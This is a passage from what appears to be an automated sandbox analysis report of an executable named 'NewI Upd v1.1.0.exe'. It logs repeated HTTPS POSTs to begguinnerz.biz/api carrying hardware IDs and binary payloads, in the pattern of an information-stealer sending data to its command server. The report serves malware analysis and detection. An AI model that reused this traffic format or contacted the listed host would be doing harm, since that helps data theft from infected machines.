                                                                                Data Ascii: IDHgsHWs18ljt0QVbdrw8S6MYtbFOupUikFOhwpFlpdkff22bOWF2namSQktzLH6JsU0n457pF6ZBR/CNFaUimNhs4Vn/Z7KfrBFSAzAvPUnyyrW0Xv9GYZJB9pCRpeebXb/uGnjiNR8qk0YLMa4+irBKJzEJ+1QjEtPkAEG3dJpabHvJN6F3H+2TgVj3P7vYss21pZ19kuBTkeFDFSSmmF78bFv5ozWd65KDCLOsfciyTqf3DikF8FCX8JaBqS
                                                                                2024-12-27 02:03:13 UTC1369INData Raw: 65 38 30 6f 73 2f 62 59 75 41 62 57 6e 47 59 35 61 56 31 6e 47 69 4a 67 43 79 6b 54 38 45 64 46 63 78 43 56 4e 50 4b 4c 6a 62 79 70 58 62 71 6a 4d 6c 77 35 33 30 30 41 38 69 38 39 53 37 4e 50 64 61 41 64 65 73 5a 32 58 77 48 67 52 42 55 33 49 4e 34 66 4f 47 77 4b 4f 53 65 30 6e 2f 67 44 55 70 76 78 37 76 36 4a 38 73 71 32 64 77 6c 37 31 57 58 43 55 4f 51 51 67 6a 54 67 32 56 2b 34 37 6c 6a 6f 35 37 4a 66 72 42 41 44 79 53 50 75 4f 63 76 77 48 72 59 6a 69 44 76 56 59 64 49 55 73 30 54 55 4a 43 45 61 54 33 35 70 6d 6e 67 7a 2b 41 39 34 46 74 4b 65 34 4f 46 39 53 7a 43 50 59 44 66 65 4d 52 53 6a 55 5a 4c 67 77 55 47 33 64 4a 6f 4d 61 6e 6b 4b 71 79 4c 7a 6a 50 34 45 31 68 34 6c 75 4f 68 63 70 34 6c 32 4e 64 31 38 68 6e 5a 46 77 6e 43 45 41 62 4c 30 69 6c 79
                                                                                Data Ascii: e80os/bYuAbWnGY5aV1nGiJgCykT8EdFcxCVNPKLjbypXbqjMlw5300A8i89S7NPdaAdesZ2XwHgRBU3IN4fOGwKOSe0n/gDUpvx7v6J8sq2dwl71WXCUOQQgjTg2V+47ljo57JfrBADySPuOcvwHrYjiDvVYdIUs0TUJCEaT35pmngz+A94FtKe4OF9SzCPYDfeMRSjUZLgwUG3dJoMankKqyLzjP4E1h4luOhcp4l2Nd18hnZFwnCEAbL0ily
                                                                                2024-12-27 02:03:13 UTC1369INData Raw: 2b 42 33 47 47 79 52 51 6b 31 77 50 66 49 48 4f 6b 33 6d 38 73 37 34 32 65 2f 5a 45 32 53 44 30 6d 55 72 46 42 47 34 4c 42 30 72 71 6e 63 5a 61 4d 44 52 47 50 62 38 4b 35 69 37 54 43 47 77 7a 72 6a 47 63 38 46 51 38 4a 61 42 72 61 66 59 33 54 2f 73 43 62 4e 68 63 39 2b 72 30 52 4b 62 59 4f 38 74 6e 71 4d 4f 35 7a 65 4f 4f 74 65 7a 55 4a 64 68 55 49 49 30 35 77 75 4b 62 47 32 62 76 79 43 30 48 54 73 52 51 51 74 67 36 2b 34 4f 34 77 73 31 70 5a 6d 71 68 6d 54 42 52 2f 43 52 55 69 65 6b 32 31 2f 38 71 56 32 36 6f 7a 4a 63 4f 64 39 4e 41 62 4f 76 66 4d 73 79 77 53 6f 37 7a 2f 30 56 49 35 43 42 61 49 46 55 4a 43 73 55 45 62 67 73 48 53 75 71 64 78 6c 6f 77 4e 45 59 39 76 77 72 6d 4c 74 4d 49 62 44 4f 75 4d 62 6f 55 4a 52 67 55 49 49 30 35 59 75 4b 62 47 53 61
                                                                                Data Ascii: +B3GGyRQk1wPfIHOk3m8s742e/ZE2SD0mUrFBG4LB0rqncZaMDRGPb8K5i7TCGwzrjGc8FQ8JaBrafY3T/sCbNhc9+r0RKbYO8tnqMO5zeOOtezUJdhUII05wuKbG2bvyC0HTsRQQtg6+4O4ws1pZmqhmTBR/CRUiek21/8qV26ozJcOd9NAbOvfMsywSo7z/0VI5CBaIFUJCsUEbgsHSuqdxlowNEY9vwrmLtMIbDOuMboUJRgUII05YuKbGSa


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.449895172.67.190.2234436648C:\Users\user\Desktop\NewI Upd v1.1.0.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 02:03:15 UTC282OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=KFE639LIZR1YG3YZ5JZ
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 18176
                                                                                Host: begguinnerz.biz
                                                                                2024-12-27 02:03:15 UTC15331OUTData Raw: 2d 2d 4b 46 45 36 33 39 4c 49 5a 52 31 59 47 33 59 5a 35 4a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 30 32 31 33 31 39 30 44 32 32 32 38 33 36 39 44 39 32 33 46 39 31 33 46 38 41 41 36 46 37 0d 0a 2d 2d 4b 46 45 36 33 39 4c 49 5a 52 31 59 47 33 59 5a 35 4a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 46 45 36 33 39 4c 49 5a 52 31 59 47 33 59 5a 35 4a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66
                                                                                Data Ascii: --KFE639LIZR1YG3YZ5JZContent-Disposition: form-data; name="hwid"690213190D2228369D923F913F8AA6F7--KFE639LIZR1YG3YZ5JZContent-Disposition: form-data; name="pid"2--KFE639LIZR1YG3YZ5JZContent-Disposition: form-data; name="lid"HpOoIh--3f
                                                                                2024-12-27 02:03:15 UTC2845OUTData Raw: 8e d2 6d b6 ae 65 d3 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af
                                                                                Data Ascii: me,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)
                                                                                2024-12-27 02:03:16 UTC1132INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 02:03:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=e281kuo4081bv5rpi3cslnh362; expires=Mon, 21 Apr 2025 19:49:54 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AuAj%2F9wd5k17KI%2FRUc6wcU80r1vaOLSpsFjcDTmWU4cizxSeCy7OVqm0PrHZzcidUrN7stFNn%2Fg8RmEFtAiOprFuOYyu0fAGSxYkDMxH23vBIawy%2BbWiw1Rewf81%2FV6romo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f85bbac3b94de96-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1469&rtt_var=573&sent=14&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19138&delivery_rate=1872995&cwnd=224&unsent_bytes=0&cid=d1fd00d032099f90&ts=1019&x=0"
                                                                                2024-12-27 02:03:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-27 02:03:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.449902172.67.190.2234436648C:\Users\user\Desktop\NewI Upd v1.1.0.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 02:03:17 UTC276OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=QUWCUNM037OXH2
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 8767
                                                                                Host: begguinnerz.biz
                                                                                2024-12-27 02:03:17 UTC8767OUTData Raw: 2d 2d 51 55 57 43 55 4e 4d 30 33 37 4f 58 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 30 32 31 33 31 39 30 44 32 32 32 38 33 36 39 44 39 32 33 46 39 31 33 46 38 41 41 36 46 37 0d 0a 2d 2d 51 55 57 43 55 4e 4d 30 33 37 4f 58 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 55 57 43 55 4e 4d 30 33 37 4f 58 48 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 51
                                                                                Data Ascii: --QUWCUNM037OXH2Content-Disposition: form-data; name="hwid"690213190D2228369D923F913F8AA6F7--QUWCUNM037OXH2Content-Disposition: form-data; name="pid"2--QUWCUNM037OXH2Content-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--Q
                                                                                2024-12-27 02:03:18 UTC1129INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 02:03:18 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=rfm2tmnjo1n5qbfjnjtk8rc4d7; expires=Mon, 21 Apr 2025 19:49:56 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lEBt%2Fzc4wNqQYcV5pXro6fUqwMcxdr%2BvEB7qgIEAea8LT5ELQ13ARS772uiIG2jCe73RHj0MbWgfTNK1r5DT4CKbpGKlQF%2ByXUhaXBW%2F1YdbOhwFjDMPpXls49r%2FGttVDYA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f85bbbade857c7e-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3888&min_rtt=3287&rtt_var=1662&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2840&recv_bytes=9701&delivery_rate=888348&cwnd=228&unsent_bytes=0&cid=3957bb8f4737c33e&ts=777&x=0"
                                                                                2024-12-27 02:03:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-27 02:03:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.449907172.67.190.2234436648C:\Users\user\Desktop\NewI Upd v1.1.0.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 02:03:19 UTC279OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=6NPOTZ340UM1I91M
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 20432
                                                                                Host: begguinnerz.biz
                                                                                2024-12-27 02:03:19 UTC15331OUTData Raw: 2d 2d 36 4e 50 4f 54 5a 33 34 30 55 4d 31 49 39 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 30 32 31 33 31 39 30 44 32 32 32 38 33 36 39 44 39 32 33 46 39 31 33 46 38 41 41 36 46 37 0d 0a 2d 2d 36 4e 50 4f 54 5a 33 34 30 55 4d 31 49 39 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 4e 50 4f 54 5a 33 34 30 55 4d 31 49 39 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36
                                                                                Data Ascii: --6NPOTZ340UM1I91MContent-Disposition: form-data; name="hwid"690213190D2228369D923F913F8AA6F7--6NPOTZ340UM1I91MContent-Disposition: form-data; name="pid"3--6NPOTZ340UM1I91MContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a36
                                                                                2024-12-27 02:03:19 UTC5101OUTData Raw: 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00
                                                                                Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                2024-12-27 02:03:20 UTC1129INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 02:03:20 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=831gs51r4ab98n6qcvv2t2rth8; expires=Mon, 21 Apr 2025 19:49:59 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hvsu4ApRg%2FMa0raetTgMS0COEV5OyK5AZ8b7KDSK0kxbxK%2BVmWTYL0ujgFDbkXVANZZpav6men6JQ2kGViSoAQArFKqLXFgxLbzvwPiTmM421v%2FlB9s6%2FZSFt7fP7f7N958%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f85bbc89de24385-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1807&rtt_var=684&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21391&delivery_rate=1593886&cwnd=250&unsent_bytes=0&cid=553d7b6d2e124f44&ts=977&x=0"
                                                                                2024-12-27 02:03:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-27 02:03:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.449914172.67.190.2234436648C:\Users\user\Desktop\NewI Upd v1.1.0.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 02:03:22 UTC281OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=0VJUNPD5A8U7ORRNJ62
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 1266
                                                                                Host: begguinnerz.biz
                                                                                2024-12-27 02:03:22 UTC1266OUTData Raw: 2d 2d 30 56 4a 55 4e 50 44 35 41 38 55 37 4f 52 52 4e 4a 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 30 32 31 33 31 39 30 44 32 32 32 38 33 36 39 44 39 32 33 46 39 31 33 46 38 41 41 36 46 37 0d 0a 2d 2d 30 56 4a 55 4e 50 44 35 41 38 55 37 4f 52 52 4e 4a 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 56 4a 55 4e 50 44 35 41 38 55 37 4f 52 52 4e 4a 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66
                                                                                Data Ascii: --0VJUNPD5A8U7ORRNJ62Content-Disposition: form-data; name="hwid"690213190D2228369D923F913F8AA6F7--0VJUNPD5A8U7ORRNJ62Content-Disposition: form-data; name="pid"1--0VJUNPD5A8U7ORRNJ62Content-Disposition: form-data; name="lid"HpOoIh--3f
                                                                                2024-12-27 02:03:23 UTC1128INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 02:03:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=5bqi7kgfo2fgik7m4f4v9gdvbd; expires=Mon, 21 Apr 2025 19:50:01 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B1EZ8AJ6fhbiBcP7T4y3E3LKq7XSXyL7E2vFkdg8kK5kNZkHhme%2FiqTP0BBIGVUz9StpI4t%2BiDAGmFx2hA%2BPHWOv5CbkJkx2J0b8FXmaKK8dhmAdV1Wkc9ftLoDw6%2Bn%2Fxfo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f85bbd9edd2c407-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1499&rtt_var=569&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2183&delivery_rate=1913499&cwnd=197&unsent_bytes=0&cid=913048d752394160&ts=738&x=0"
                                                                                2024-12-27 02:03:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-27 02:03:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.449920172.67.190.2234436648C:\Users\user\Desktop\NewI Upd v1.1.0.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 02:03:24 UTC273OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=SXIRRLO7FAI
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 1077
                                                                                Host: begguinnerz.biz
                                                                                2024-12-27 02:03:24 UTC1077OUTData Raw: 2d 2d 53 58 49 52 52 4c 4f 37 46 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 30 32 31 33 31 39 30 44 32 32 32 38 33 36 39 44 39 32 33 46 39 31 33 46 38 41 41 36 46 37 0d 0a 2d 2d 53 58 49 52 52 4c 4f 37 46 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 58 49 52 52 4c 4f 37 46 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 53 58 49 52 52 4c 4f 37 46 41
                                                                                Data Ascii: --SXIRRLO7FAIContent-Disposition: form-data; name="hwid"690213190D2228369D923F913F8AA6F7--SXIRRLO7FAIContent-Disposition: form-data; name="pid"1--SXIRRLO7FAIContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--SXIRRLO7FA
                                                                                2024-12-27 02:03:25 UTC1126INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 02:03:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=371o5manjmqev886qoio2q8oru; expires=Mon, 21 Apr 2025 19:50:03 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aHjmkEN7KBcklLGbv4z0QH6gRczm%2FO58TxIVL8EOH0YRcbefxOwLuE76a4aie%2BRPaoP5bfpxKlXBynt3kmMAxwBsUVPF%2Bkm62OElIZI0xSmzbqxsIGrStK5L2fBHfSrkiFs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f85bbe709361a34-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7126&min_rtt=1856&rtt_var=4004&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1986&delivery_rate=1573275&cwnd=185&unsent_bytes=0&cid=212acd6c02c64484&ts=1427&x=0"
                                                                                2024-12-27 02:03:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-27 02:03:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.449926172.67.190.2234436648C:\Users\user\Desktop\NewI Upd v1.1.0.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-27 02:03:27 UTC264OUTPOST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 121
                                                                                Host: begguinnerz.biz
                                                                                2024-12-27 02:03:27 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 36 39 30 32 31 33 31 39 30 44 32 32 32 38 33 36 39 44 39 32 33 46 39 31 33 46 38 41 41 36 46 37
                                                                                Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=690213190D2228369D923F913F8AA6F7
                                                                                2024-12-27 02:03:27 UTC1130INHTTP/1.1 200 OK
                                                                                Date: Fri, 27 Dec 2024 02:03:27 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=lqd4irhah02iesssddmoei8fj0; expires=Mon, 21 Apr 2025 19:50:06 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
